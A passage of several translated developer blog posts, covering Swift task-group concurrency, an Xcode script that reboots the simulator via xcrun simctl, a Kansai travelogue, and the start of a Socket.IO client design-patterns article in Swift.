+ for image in images {
+ image.thumbnail = try await generateThumbnail(url: image.url)
+ }
+}
+
Executing one at a time, slow efficiency and performance.
1
+2
+3
+4
+5
+6
+7
+
func generateAllThumbnails() async throws {
+ try await withThrowingDiscardingTaskGroup { taskGroup in
+ for image in images {
+ image.thumbnail = try await generateThumbnail(url: image.url)
+ }
+ }
+}
+
Adding each Task to TaskGroup Concurrency for execution.
Issue: Image recognition and cropping operations are memory-intensive. Unrestrained parallel tasks may cause user lagging and OOM crashes.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+
func generateAllThumbnails() async throws {
+ try await withThrowingDiscardingTaskGroup {
+ taskGroup in
+ // Maximum execution not to exceed 5
+ let maxImageTasks = min(5, images.count)
+ // Fill in 5 tasks first
+ for index in 0..<maxImageTasks {
+ taskGroup.addTask {
+ image[index].thumbnail = try await generateThumbnail(url: image[index].url)
+ }
+ }
+ var nextIndex = maxImageTasks
+ for try await _ in taskGroup {
+ // When a Task in taskGroup completes await...
+ // Check if the Index reaches the end
+ if nextIndex < images.count {
+ let image = images[nextIndex]
+ // Continue filling tasks one by one (maintaining at most 5)
+ taskGroup.addTask {
+ image.thumbnail = try await generateThumbnail(url: image.url)
+ }
+ nextIndex += 1
+ }
+ }
+ }
+}
+
supportedComputeDevices()
API.VNXXRequest
, VNXXXObservation
-> Request
, Observation
*Request.perform()
directly instead of VNImageRequestHandler.perform([VN*Request])
.👉👉👉This book club sharing is derived from the weekly technical sharing activities within the KKday App Team. The team is currently enthusiastically recruiting Senior iOS Engineer , interested friends are welcome to submit resumes.👈👈👈
The Vision Framework API has been redesigned to leverage modern Swift features like concurrency, making it easier and faster to integrate a wide array of Vision algorithms into your app. We’ll tour the updated API and share sample code, along with best practices, to help you get the benefits of this framework with less coding effort. We’ll also demonstrate two new features: image aesthetics and holistic body pose.
-
Feel free to contact me for any questions or feedback.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Temporary workaround to solve XCode Build & Run app black screen issue
Photo by Etienne Girardet
I don’t know when XCode started (maybe 14?) some projects will freeze on a black screen after multiple Build & Run on the simulator. The status stays at “Launching Application…” without any response; even rebuilding and running again doesn’t work, manual termination of the entire simulator is required to restart and fix it.
XCode 14.1: Stuck at “Launching Ap… | Apple Developer Forums Hello team, On Xcode 14.1, After building the project and when the simulator launches, it shows blank black screen… forums.developer.apple.com
New projects or projects with fewer settings encounter this issue less frequently; older projects face it more often, but due to their long history and complex settings, no definite root cause can be found through online searches, mostly speculated to be an XCode Bug (or M1?). However, this issue is very annoying, as during frequent Build & Run to check progress, the result is a black screen, requiring a complete restart each time, wasting about 1-2 minutes, disrupting development flow.
Here is a workaround to navigate around this issue. Since we can’t avoid the black screen problem and it doesn’t occur on the first launch of the simulator during Build & Run, we just need to ensure that each Build & Run is on a freshly restarted simulator.
Device UUID
of the simulator you want to runRun the following command in Terminal:
1
+
xcrun simctl list devices
+
08C43D34–9BF0–42CF-B1B9–1E92838413CC
auto-reboot.sh
Shell Script filecd /directory/where/you/want/to/place/this/script/
vi auto-reboot.sh
Paste the following script:
[Device UUID]
with the Device UUID of the emulator you want to use1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+
#!/bin/bash
+
+## Use the command below to find the Device UUID of the simulator you want to use:
+## xcrun simctl list devices
+
+# shutdown simulator
+xcrun simctl shutdown [Device UUID]
+
+# reboot simulator
+xcrun simctl boot [Device UUID]
+
ESC
& :wq!
Adjust the execution permission of auto-reboot.sh
:
1
+
chmod +x auto-reboot.sh
+
Since everyone has different preferences for emulators, I set this up in XCode Behaviors. This won’t affect project settings or impact team members on git. However, for a simple and team-wide synchronization, you can directly set it in Scheme -> Build -> Pre-actions -> sh /directory/where/you/want/to/place/this/script/auto-reboot.sh
.
XCode -> Behaviors -> Edit Behaviors…
Running
sectionCompletes
option Completion Trigger = Stop or RebuildCheck Run
on the right
Choose Script…
and select the location of the newly created auto-reboot.sh
fileWe use XCode Behaviors to restart the emulator at the Completes (Stop or Rebuild) trigger point, just before starting the Build. This process almost always completes the restart before the Build -> Run finishes.
If you repeatedly restart, there is a chance of a slow restart, causing another black screen issue when running. However, this scenario is not considered, as this solution ensures normal execution of Build & Run App in daily use.
In terms of speed impact, I think it’s acceptable because Build & Run itself takes some time, which is usually enough time for the emulator to restart.
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Record of an 8-day free and easy trip to Kyoto, Osaka, and Kobe in May 2023, including information on food, accommodation, and transportation.
Previously, I have only been to two Southeast Asian countries, Sabah 🇲🇾 in 2019 and Bangkok 🇹🇭 in 2018, both on group tours.
I really like the boundless blue sky and unrestrained freedom in Southeast Asia.
As an enthusiastic and impulsive ENFP who acts on a whim, the time between the proposal and departure of this trip was only two weeks. It all started when my friend Huang Xinping happened to have a career gap, and he, an INFJ complementing my ENFP personality, provided detailed planning while I offered enthusiastic direction. With this perfect harmony, we decided to embark on this journey on a whim.
Since everything was quite spontaneous, and we only planned to visit Universal Studios Osaka, we bought tickets online. However, due to the proximity to the travel date, all special tickets were sold out, and we had to settle for regular entry tickets.
For popular attractions and theme parks in Japan, it’s really necessary to buy tickets in advance Orz. This time, we missed out on baseball tickets, and there were no tickets available on-site, so we could only do a day tour of the venue.
For other attractions, temples, and journeys, we decided on the spot.
It’s essential to have Japanese yen as most temple tickets, souvenirs, amulets, and some trams (if you want a seat) only accept cash.
I exchanged $50,000 Japanese yen for this trip, and I had around $15,000 left at the end.
With less than a month before departure, we quickly found a flight on SkyScanner that suited our spontaneous pace:
Taipei <-> Kansai
EVA Air BR 130
13:35 TPE -> KIX 17:15 (actually delayed by over 1 hour, arrived in Japan at 18:40)EVA Air BR 177
11:10 KIX -> TPE 13:05Round trip: $14,915
It seems that since last year, the baggage check-in has changed to a combination of piece and weight system, with one piece per person weighing up to 23kg; additional charges apply for anything extra.
Buying flight tickets with a credit card often includes travel insurance, so it’s recommended to purchase tickets separately for each individual and check the insurance coverage of the credit card, as some debit cards may not have it.
You can also opt for additional travel insurance (medical, inconvenience, loss, accident, etc.) for around $1,500 for an 8-day trip.
I recommend installing The Flight Tracker App to input flight information and track real-time flight details, including terminals, boarding gates, and baggage claim information. (It provides notifications for any changes, but it’s always best to rely on on-site information.)
You can enable iOS Live Activity feature to track in real time a few hours before the plane takes off
I directly bought an 8-day unlimited data SIM card from KKDAY for about $700; there is also an E-SIM version, but I prefer to switch physical SIM cards as I feel more secure.
You can use Sucia watermelon card directly on trains, subways, or buses; it is also accepted at some convenience stores and shops.
For iPhone users, you can directly add a virtual Sucia card by going to “Wallet & Apple Pay” -> “Add Card” -> “Transit Card” -> “Japan” -> “Sucia”.
To top up with a Master Card, I failed to top up with a Visa card; It is recommended to top up in Taiwan in advance, otherwise, you may find yourself unable to top up or receive SMS verification codes in Japan, rendering the card unusable.
If you cannot use iPhone Sucia or Android; physical Sucia cards in Japan are currently out of stock, so you can only purchase the 28-day Welcome Suica limited-time watermelon card, which can be topped up and used, but it will become invalid after the expiration date and no refunds are available.
Apple Watch also supports Suica (not interchangeable with iPhone), remember to set it up and top up in Taiwan beforehand.
When using the iPhone transit card, you do not need to bring up the Apple Pay interface specifically when tapping; just take out your device and tap directly (it will wake up the interface automatically).
I mainly used Agoda to find places near train and subway stations.
Toyoko Inn was recommended by friends from Northeast Asia, it is a chain hotel with high value for money and reliable quality, and it includes a Japanese-style breakfast (rice ball or curry rice).
Due to booking late, only Toyoko Inn Shijo Omiya in Kyoto had available rooms; it is about 3 kilometers away from Kyoto Station:
NT$3,844 for 2 persons
Due to late booking, there were limited choices; we chose another chain hotel, APA, which is closer to the station but slightly more expensive; it does not include breakfast but has facilities such as a swimming pool, public baths, etc.
It is about a 15-minute walk from Osaka Umeda Station:
NT$21,459 for 2 persons
No need to apply for a visa, no need to provide COVID vaccine/nucleic acid proof; after booking flights and accommodation, you can fill in the entry information on Visit Japan, and once your phone connects to the internet after landing, you can directly enter the country, if not pre-applied, you will have to fill out a paper form on the spot.
1. Register: https://www.vjw.digital.go.jp/main/#/vjwpco001 account
2. Choose “Register for Entry/Return”
3. Enter flight information for entry
Image for illustration purposes only
Travel Name: Customized for personal use
4. Enter contact information in Japanese
Image for illustration purposes only
I am entering the hotel information for the first day of stay, using Google to find the English version of the hotel address and hotel contact number (does not need to be too accurate, just not too far off, at least the hotel name should be correct).
5. Log in to make a reservation
Image for illustration purposes only
6. Select “Return to Immigration and Customs Procedures” to continue filling out the information
7. Select “Foreigner’s Entry Record”
8. Fill out basic information
The duration of stay includes arrival and departure, totaling 8 days.
Complete the registration in the final step:
9. Select “Return to Immigration and Customs Procedures” again to fill out “Customs Declaration Preparation”
After filling out the basic information, keep selecting “No” until completing the registration:
10. Completion
Steps upon entry:
Scan your passport and this QR code at the self-service customs inspection machine, confirm, and you will have completed the entry process.
Log in to the airline’s website or email for online check-in, and you can directly add the ticket to Apple Pay for complete digitization.
As it is a noon flight, leave in the morning, arrive at the A1 Taipei Main Station of the Airport MRT at 9 o’clock for pre-check-in:
Pre-check-in = Complete check-in + luggage inspection + baggage check at A1 Taipei Main Station (also available at A13 New Taipei Industrial Park); you can go through immigration directly at the airport without queuing at the counter.
If coming from the MRT, remember not to go directly down the escalator to the Airport MRT, as pre-check-in is outside the Airport MRT.
Restrictions:
Service Hours:
Remember to check the airport shuttle official website for direct shuttle schedules before heading out. It’s better to control the actual time to the airport; be sure to take the direct shuttle.
Leaving too early + pre-boarding, there’s still nearly 3 hours after exiting before takeoff.
Airport with few people at noon
Having Lin Dongfang beef noodles while waiting for the flight
Surprisingly, there’s Xingbo Coffee!
Due to a delayed landing, the takeoff was delayed by over an hour.
Not sure if it’s because of pre-boarding, the ground staff announced our names during the waiting time to confirm our presence and boarding.
Bye 🇹🇼
After the plane landed, changed to a Japanese SIM card and connected to the internet, then logged into Vista Japan to complete the immigration and customs procedures.
After clearing customs at Kansai Airport, we directly took the JR Kanku Special Rapid Service HARUKA
to Kyoto Station
, about 1.5 hours, with only a few stops along the way.
It’s recommended to buy tickets at the ticket machine to ensure you have a seat.
Seeing the iconic Kyoto Tower right after leaving the station
Then took a taxi to the hotel (didn’t take the bus because of luggage, otherwise there would be a bus available); combined with the flight delay, we arrived at the hotel around 9 pm on the first day.
There was a staff member at the hotel reception who spoke Chinese, so I asked her for advice on tomorrow’s itinerary for a smoother experience - very friendly and convenient!
The room was cool, with two single rooms connected by a shared bathroom with a full-length mirror.
Hanamaru Kaiten Sushi Seisakujo Omiya Store
It was late, so after settling in at the hotel, we went out nearby to find something to eat and decided on a skewer restaurant.
Plum Tea Rice
Starting at 80 yen per skewer, fresh, delicious, and cheap! Unexpectedly delightful, but when we wanted to visit again the next day, the shop was closed. QQ
After eating, we went to the convenience store LAWSON to buy some late-night snacks to continue eating at the hotel:
The soy sauce fried noodles were just okay, but they felt heavy to eat.
In the early morning, we packed breakfast downstairs and ate in the room:
Curry rice, a bit too heavy for breakfast, prefer Western or Taiwanese breakfast.
After breakfast, we took a bus to Yasaka Shrine:
We walked to Kiyomizu-dera along the way:
Kyoto’s streets are so clean that even the roadside cement blocks are not dirty.
Yasaka Pagoda
Stopped at a shop halfway for iced matcha and black sugar dumplings:
Arrived at Kiyomizu-dera:
The sun was scorching, and there were many people.
Otowa Waterfall
Lined up to pray for success in academics, love, health, and longevity at the waterfall.
After the visit, we walked back to Yasaka Shrine, casually ate a rice bowl and bought a cup of coffee on the way:
In the afternoon, took a bus to “Kaohsiung”… (just kidding, it’s Kinkaku-ji)
After getting off the bus, it takes about a 15-minute walk to reach Kinkaku-ji:
The bus stop on the way back was crowded, so if you’re agile, like us, you can walk to the next intersection to catch another bus route and avoid the crowd, heading to Kyoto Tower.
Around 5:30 pm, we arrived at the Kyoto Tower observation deck:
You can overlook Kyoto from the tower, and there’s a bar downstairs. We planned to go down to rest and come back up for the night view, but we found out that re-entry was not allowed once we went down, so we gave up.
Here’s a photo of the Kyoto Tower night view taken from outside after we left. (The weather was really nice)
Cute little things
Go to the convenience store and buy some instant noodles for supper at the hotel.
Didn’t have breakfast at the hotel the next day, got up early, checked out, stored luggage, and headed to Arashiyama.
Having McDonald’s breakfast (cheaper than Taiwan by $15)
After eating, walk across the street and take a ride to Arashiyama
Shijo Omiya is the starting station, take it directly to the final station Arashiyama, very convenient and always have seats.
Arrival:
First, walk towards Arashiyama after arrival:
You can experience taking a boat to see the river view (similar to Bitan in Taiwan?)
For those with good physical strength, you can choose a small hike:
We went hiking to see monkeys and the panoramic view. It takes about 30-45 minutes from the bottom of the mountain to the top, not difficult to walk.
There are really monkeys
After descending, on the way back, we had lunch with tempura soba noodles:
Ordered wrong, shouldn’t have ordered tempura rice, it became soba noodles + tempura rice hole.
After eating, head in another direction towards “Tenryu-ji Temple”:
Come out from the back door of Tenryu-ji Temple and go directly to the bamboo forest:
There are really a lot of people, find a good angle for photos 🥵
It’s also beautiful to take photos from bottom to top.
Having ice cream after descending, getting ready to head back
Bought local sake as a souvenir
Return to Shijo Omiya to the hotel to pick up luggage and prepare to go to Osaka:
The hotel is right outside Hankyu Omiya Station
When I first came here on the first day, I felt a bit inconvenient because it was a distance from Kyoto Station; but later I found it was actually great; it’s the central point of Kinkaku-ji and Kiyomizu-dera, there is a direct tram to Arashiyama when you come out, and it’s also direct to Osaka (remember about an hour).
When first arriving in Osaka, it’s easy to get lost, there are many exits, Osaka and Umeda are actually the same location.
The hotel rooftop has a free outdoor swimming pool, a convenience store inside the hotel, and a free public bath.
After dropping off the luggage, go out to find food:
There is a bear in the amusement park that makes fun of itself!!
Following the instructions on Google Maps, take the train and then walk to Osaka Castle. The walking part from the station to the moat and then to the main castle takes about 30 minutes, a bit of a distance.
The line at the ticket counter is very long, you can purchase tickets online here to enter without waiting.
View of Osaka from the top:
There is a history of the Warring States on each floor inside:
After leaving Osaka Castle, we walked around nearby and looked for food.
Then we went to the outskirts of Tsuruhashi to buy some things at small shops.
We walked around Tsuruhashi, which seems to be a non-touristy area with few tourists; quite a few Korean peripheral shops, more like a Korean town for Japanese people.
Just came to find some Korean cultural and creative items, later found out that Taiwan also sells them -_-
After walking around Osaka for a long time, my feet couldn’t take it anymore; fortunately, on the way back, we stopped by Nintendo when returning to Osaka Umeda Station.
Osaka Nintendo is located upstairs at Daimaru Department Store next to the station.
Went crazy buying The Legend of Zelda merchandise:
Everything is of high quality, the badges are made of metal, and the workmanship is very delicate.
Didn’t buy the Express Pass, didn’t go to Super Mario World early in the morning to queue up; we took a relaxed and casual approach and entered the park after 10 a.m.
There were a lot of people entering the park, so we quickly checked the Super Mario World tickets on the app; luckily, the expert Huang Xinping won the 5 p.m. entry qualification for Super Mario World.
First, we went to the Harry Potter themed area:
Butterbeer
We queued to buy Butterbeer (non-alcoholic, very sweet); felt that if we really wanted to collect it, we should buy the most expensive glass.
Next stop, Jurassic Park:
We queued for the rides, about 45 minutes wait; sat in the front row.
Similar to a volcano adventure, it will rush down at the end 🥵 (I’m afraid of the feeling of weightlessness).
But fortunately, I still had fun. Later, I saw the news that this facility will be reorganized starting in June and will probably be closed for a few years.
The scenery inside is very realistic, you would think you are in the 🇺🇸 without saying it.
Yoshi!!
Unexpectedly fun at the beginning, the melody is still in my mind today!
There will be floats (Mario, Pokémon, Sesame Street… characters) and dancers leading the parade, stopping at each section to get everyone to dance together! All staff, including those maintaining order, will also dance together, creating a strong sense of involvement!
East and west sway, around five o’clock head to Super Mario World.
I have to admire the scene design, completely bringing the game world to reality, like stepping into a paradise!
As it was close to closing time, I didn’t buy a watch to play interactive scenes, just went to queue for Yoshi’s facility.
Every detail is done very delicately!
Before closing, I took some night views of Universal Studios, many crowded places became great for photography.
Especially in the Harry Potter themed area, the scenes originally crowded with wand interactions were empty before closing, saw a sister playing alone and enjoying every interactive scene XD
Finally took a picture of the globe, goodbye Universal.
At night, had izakaya dinner, bought Nissin instant noodles as a midnight snack (after eating back and forth, this is still the best).
Early in the morning, took a train to Kobe.
First went to explore Kobe shopping street.
Tried the famous Kobe beef croquette.
Walked from the shopping street to Kobe Port.
Realized Kobe Tower was under maintenance QQ
Completion time details uncertain
On the way back, strolled through the streets of Kobe.
Found a cafe in Kobe to take a break:
Strawberry chocolate milkshake, tasty but very sweet.
From Kobe to Dotonbori
Had dinner at the famous Osaka Shinsekai Kushikatsu Ittoku.
After eating, started the tourist itinerary, took photos of landmarks, and went to a drugstore to shop.
Glico
Back to Taiwan and only realized I took the wrong photo after checking IG XD. There are better photo spots when entering from the nearby department store.
Back to the hotel to continue eating instant noodles and drinking sake as supper.
No impression of the taste
[_KKday Osaka Sightseeing Pass Osaka e-Pass_](https://www.kkday.com/zh-tw/product/114351-osaka-sightseeing-pass-osaka-e-pass-japan?cid=19365&ud1=76d66c2e34af){:target=”_blank”}
Last day countdown to return to Taiwan, a sightseeing itinerary.
Decided impulsively in the early morning to go to Koshien to watch the Hanshin Tigers baseball game, took the subway to Koshien Station.
The Koshien Baseball Stadium is right outside the station.
But we were out of luck, unlike in Taiwan where there are always seats at baseball games, all Hanshin games were sold out until July; you have to buy tickets early, otherwise, you can only do a day trip outside the stadium.
Finally, we had something to eat nearby, bought some Hanshin Tigers souvenirs, and went to Cafe de L’ambre for a coffee before leaving.
I always thought it was called “Coffee Place”
Hanshin Tigers sticker
After leaving Koshien, we went to Namba for shopping.
Also had some takoyaki and crab legs by the roadside.
Perhaps we went to the wrong store, felt quite ordinary.
Walked back to Dotonbori and headed to the original Don Quijote store.
Only the original store has a Ferris wheel
After shopping, we returned to Osaka in the evening and found an izakaya near our accommodation for our final dinner.
Took one last look at the Osaka night view.
The flight was at noon, so we checked out at 7 am to head to Kansai Airport.
The weather in Osaka changed today, it started to rain, fitting for the farewell mood.
Took a final photo of the Osaka skyline as a farewell.
Originally planned to take the train to Kansai Airport, but dragging luggage up and down; the day before, I specifically explored the bus route back (including time and station location). Went to the bus station early in the morning to check the crowd, luckily there weren’t many people in line, so we bought bus tickets to Kansai Airport and comfortably took the bus directly to Kansai Airport.
Finally found the troubleshooting counter, we completed the online check-in with just a click and could go directly to the luggage check-in counter! Saved almost an hour.
Actually, I really want to tell the people queuing, if you open the webpage now and click to receive the e-ticket, you can go to check in your luggage and then go through immigration.
After going through immigration, there weren’t many food options or stores under renovation at Kansai Airport, so I ended up buying a tonkatsu curry toast from New World.
Waiting to board the flight back to Taiwan.
Safely arrived in Taiwan in the afternoon, time to rest at home! 🇹🇼
Didn’t buy much actually, just bought whatever caught my eye; after comparing, I found that the drugstore coming out of Kyoto Station was the cheapest (about $100-$300 yen cheaper than Osaka), with Don Quijote being the most expensive.
The theme song of Yodobashi is really catchy, got brainwashed right after strolling in Kyoto.
The duty-free shopping rule in Japan requires a minimum of ¥5,000 to be eligible for tax exemption with your passport. They seal the items in a plastic bag, which you can only open upon returning home (the photos were taken at home; if you open it within the country and get checked upon exiting, you may have to pay taxes, but it didn’t seem like they were checking; remember to note that liquids can only be checked in, if there are liquids inside the sealed items, they must be checked in as a whole).
Apart from famous snacks, I mostly looked for local products from century-old shops, can’t guarantee they’re delicious but they’re guaranteed to be century-old; the recommended snacks by everyone are guaranteed to be delicious, but be prepared to queue + they’re not century-old XD
In the end, it’s best to find delicious food!
Fell in love with Japan on my first visit, already planning my next trip back.
Actually, I went to Tokyo again from 6/7-11 😝 Stay tuned for the next episode of my travelogue
Overall, convenient transportation, peaceful, pleasant weather (in May, it feels like autumn in Taiwan, cool at night), people have boundaries and are polite; really loved it!
In terms of expenses, considering the current exchange rate and prices, it’s actually cheaper than Taiwan…
Peak Steps 5/23-5/28
Also, don’t criticize others, we encountered a group from Taiwan (they had 🇹🇼 on their bags) similar to a direct sales company’s employees at Universal Studios, loudly shouting slogans and repeatedly filming “super awesome, performance is awesome” in the middle of the road, blocking the way; it was embarrassing.
In my opinion, if you want to enter the Japanese market, relying solely on advertising and marketing might be challenging, at most attracting some curious individuals; Japan has a strong cultural unity, so you need to find a way to integrate into their lives and habits to have a chance at winning their hearts.
In addition, the fault tolerance is very low, for example, bugs, unexpected appearance of other languages; for us, it may be okay once or twice, or at least not happening frequently; for them, I think it could be a disaster with just one occurrence because this thing is not rigorous enough and does not value them.
Successful Kansai Trip!
If you have any questions or suggestions, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Record of problem scenarios encountered and solutions applied when encapsulating Socket.IO Client Library requirements using Design Patterns
Photo by Daniel McCullough
This article is a record of real-world development requirements, where Design Patterns were applied to solve problems. The content will cover the background of the requirements, the actual problem scenarios encountered (What?), why Design Patterns were applied to solve the problems (Why?), and how they were implemented (How?). It is recommended to read from the beginning for coherence.
This article will introduce four scenarios encountered in developing this requirement and the application of seven Design Patterns to solve these scenarios.
This year, the company split into Feature Teams (multiple) and Platform Team; the former mainly focuses on user-side requirements, while the Platform Team deals with internal members of the company. One of their tasks is to introduce technology, build infrastructure, and ensure systematic integration to pave the way for Feature Teams when developing requirements.
The Feature Teams needed to change the original messaging feature (fetching message data by calling APIs on the page, requiring a refresh for the latest messages) to real-time communication (receiving the latest messages instantly, and sending messages).
The Platform Team’s focus was not only on the immediate real-time communication requirement but also on long-term development and reusability. After evaluation, it was deemed essential to have a WebSocket bidirectional communication mechanism in modern apps. Apart from the current requirement, there will be many future opportunities to use this mechanism. With the available resources, efforts were put into designing and developing the interface.
Goals:
Time and Resources:
This Feature will be supported on Web, iOS, and Android platforms. WebSocket bidirectional communication protocol will be introduced for implementation, with the backend expected to directly use Socket.io service.
Firstly, Socket != WebSocket
For more information on Socket and WebSocket and technical details, refer to the following two articles:
In short:
1
+2
+
Socket is an abstract encapsulation interface for the TCP/UDP transport layer, while WebSocket is a transmission protocol at the application layer.
+The relationship between Socket and WebSocket is like that of a dog and a hot dog, they are unrelated.
+
Socket.IO is a layer of abstract operation encapsulation for Engine.IO, which encapsulates the use of WebSocket. Each layer is only responsible for communication between the upper and lower layers and does not allow operations to pass through (e.g. Socket.IO directly operating WebSocket connections).
In addition to basic WebSocket connections, Socket.IO/Engine.IO also implements many convenient and useful feature sets (e.g. offline event sending mechanism, similar to HTTP request mechanism, room/group mechanism, etc.).
The main responsibility of the Platform Team is to bridge the logic between Socket.IO and Pinkoi Server Side for use by the upper Feature Teams during development.
{allowEIO3: true}
/ or Client Side specify the same version .version
Otherwise, it won’t connect.It is recommended to experiment with the mechanisms you want to use before adopting Socket.IO.
Socket.IO Swift Client is based on Starscream WebSocket Library, and can be downgraded to use Starscream if necessary.
1
+
Background information supplement ends here, let's move on to the main topic.
+
Design patterns are simply solutions to common problems in software design. You don’t necessarily have to use design patterns to develop; design patterns may not be applicable to all scenarios, and there’s no rule against deriving new design patterns on your own.
The Catalog of Design Patterns
However, existing design patterns (The 23 Gang of Four Design Patterns) are common knowledge in software design. Just mentioning an XXX Pattern will trigger a corresponding mental blueprint in everyone’s mind, without the need for much explanation. It is easier to understand the context for future maintenance, and these methods have been validated by the industry, so there’s no need to spend time examining object dependency issues. Choosing the right pattern for the right scenario can reduce communication and maintenance costs, and improve development efficiency.
Design patterns can be combined, but it is not recommended to modify existing design patterns, forcibly apply patterns that do not fit, or apply patterns that do not belong to the category (e.g. using the Chain of Responsibility pattern to create objects), as it may lose its meaning and potentially cause misunderstandings for future maintainers.
I will translate the content into English:
This article focuses on the application of Design Patterns, not the operation of Socket.IO. Some examples may be simplified for descriptive purposes and may not be applicable to real Socket.IO encapsulation.
Due to space limitations, this article will not provide detailed introductions to the architecture of each design pattern. Please click on the links for each pattern to understand its architecture before continuing to read.
Demo Code will be written in Swift.
Real-world usage:
ConnectionManager
exists as a single object in the App Lifecycle, used to manage Connection
operations.ConnectionPool
is a shared pool of Connections, where Connections are retrieved from this pool, and the logic includes providing an existing Connection when the URL Path matches. ConnectionHandler
acts as an external operator and state manager for Connection
.ConnectionFactory
works with the Flyweight Pattern. When no reusable Connection
is found in the pool, this factory interface is used to create one.1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+76
+77
+78
+79
+80
+81
+82
+83
+84
+85
+86
+87
+88
+89
+90
+91
+92
+93
+94
+95
+96
+97
+98
+99
+100
+101
+102
+103
+104
+105
+106
+107
+108
+109
+110
+111
+
import Combine
+import Foundation
+
+protocol Connection {
+ var url: URL {get}
+ var id: UUID {get}
+
+ init(url: URL)
+
+ func connect()
+ func disconnect()
+
+ func sendEvent(_ event: String)
+ func onEvent(_ event: String) -> AnyPublisher<Data?, Never>
+}
+
+protocol ConnectionFactory {
+ func create(url: URL) -> Connection
+}
+
+class ConnectionPool {
+
+ private let connectionFactory: ConnectionFactory
+ private var connections: [Connection] = []
+
+ init(connectionFactory: ConnectionFactory) {
+ self.connectionFactory = connectionFactory
+ }
+
+ func getOrCreateConnection(url: URL) -> Connection {
+ if let connection = connections.first(where: { $0.url == url }) {
+ return connection
+ } else {
+ let connection = connectionFactory.create(url: url)
+ connections.append(connection)
+ return connection
+ }
+ }
+
+}
+
+class ConnectionHandler {
+ private let connection: Connection
+ init(connection: Connection) {
+ self.connection = connection
+ }
+
+ func getConnectionUUID() -> UUID {
+ return connection.id
+ }
+}
+
+class ConnectionManager {
+ static let shared = ConnectionManager(connectionPool: ConnectionPool(connectionFactory: SIOConnectionFactory()))
+ private let connectionPool: ConnectionPool
+ private init(connectionPool: ConnectionPool) {
+ self.connectionPool = connectionPool
+ }
+
+ //
+ func requestConnectionHandler(url: URL) -> ConnectionHandler {
+ let connection = connectionPool.getOrCreateConnection(url: url)
+ return ConnectionHandler(connection: connection)
+ }
+}
+
+// Socket.IO Implementation
+class SIOConnection: Connection {
+ let url: URL
+ let id: UUID = UUID()
+
+ required init(url: URL) {
+ self.url = url
+ //
+ }
+
+ func connect() {
+ //
+ }
+
+ func disconnect() {
+ //
+ }
+
+ func sendEvent(_ event: String) {
+ //
+ }
+
+ func onEvent(_ event: String) -> AnyPublisher<Data?, Never> {
+ //
+ return PassthroughSubject<Data?, Never>().eraseToAnyPublisher()
+ }
+}
+
+class SIOConnectionFactory: ConnectionFactory {
+ func create(url: URL) -> Connection {
+ //
+ return SIOConnection(url: url)
+ }
+}
+//
+
+print(ConnectionManager.shared.requestConnectionHandler(url: URL(string: "wss://pinkoi.com/1")!).getConnectionUUID().uuidString)
+print(ConnectionManager.shared.requestConnectionHandler(url: URL(string: "wss://pinkoi.com/1")!).getConnectionUUID().uuidString)
+
+print(ConnectionManager.shared.requestConnectionHandler(url: URL(string: "wss://pinkoi.com/2")!).getConnectionUUID().uuidString)
+
+// output:
+// D99F5429-1C6D-4EB5-A56E-9373D6F37307
+// D99F5429-1C6D-4EB5-A56E-9373D6F37307
+// 599CF16F-3D7C-49CF-817B-5A57C119FE31
+
As mentioned in the background technical details, the Send Event
of the Socket.IO Swift Client does not support offline sending (but the Web/Android versions of the library do), so iOS needs to implement this feature on its own.
1
+
Interestingly, the Socket.IO Swift Client - onEvent supports offline subscription.
+
SIOManager
is the lowest-level encapsulation for communicating with Socket.IO, where the send
and request
methods are operations for Socket.IO Send Event. When the current Socket.IO is found to be disconnected, the request parameters are placed in bufferedCommands
, and when connected, they are processed one by one (First In First Out).1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+76
+77
+78
+79
+80
+81
+82
+83
+84
+85
+86
+87
+88
+89
+90
+91
+92
+93
+94
+95
+96
+97
+98
+99
+100
+101
+102
+103
+104
+105
+106
+107
+108
+
protocol BufferedCommand {
+ var sioManager: SIOManagerSpec? { get set }
+ var event: String { get }
+
+ func execute()
+}
+
+struct SendBufferedCommand: BufferedCommand {
+ let event: String
+ weak var sioManager: SIOManagerSpec?
+
+ func execute() {
+ sioManager?.send(event)
+ }
+}
+
+struct RequestBufferedCommand: BufferedCommand {
+ let event: String
+ let callback: (Data?) -> Void
+ weak var sioManager: SIOManagerSpec?
+
+ func execute() {
+ sioManager?.request(event, callback: callback)
+ }
+}
+
+protocol SIOManagerSpec: AnyObject {
+ func connect()
+ func disconnect()
+ func onEvent(event: String, callback: @escaping (Data?) -> Void)
+ func send(_ event: String)
+ func request(_ event: String, callback: @escaping (Data?) -> Void)
+}
+
+enum ConnectionState {
+ case created
+ case connected
+ case disconnected
+ case reconnecting
+ case released
+}
+
+class SIOManager: SIOManagerSpec {
+
+ var state: ConnectionState = .disconnected {
+ didSet {
+ if state == .connected {
+ executeBufferedCommands()
+ }
+ }
+ }
+
+ private var bufferedCommands: [BufferedCommand] = []
+
+ func connect() {
+ state = .connected
+ }
+
+ func disconnect() {
+ state = .disconnected
+ }
+
+ func send(_ event: String) {
+ guard state == .connected else {
+ appendBufferedCommands(connectionCommand: SendBufferedCommand(event: event, sioManager: self))
+ return
+ }
+
+ print("Send:\(event)")
+ }
+
+ func request(_ event: String, callback: @escaping (Data?) -> Void) {
+ guard state == .connected else {
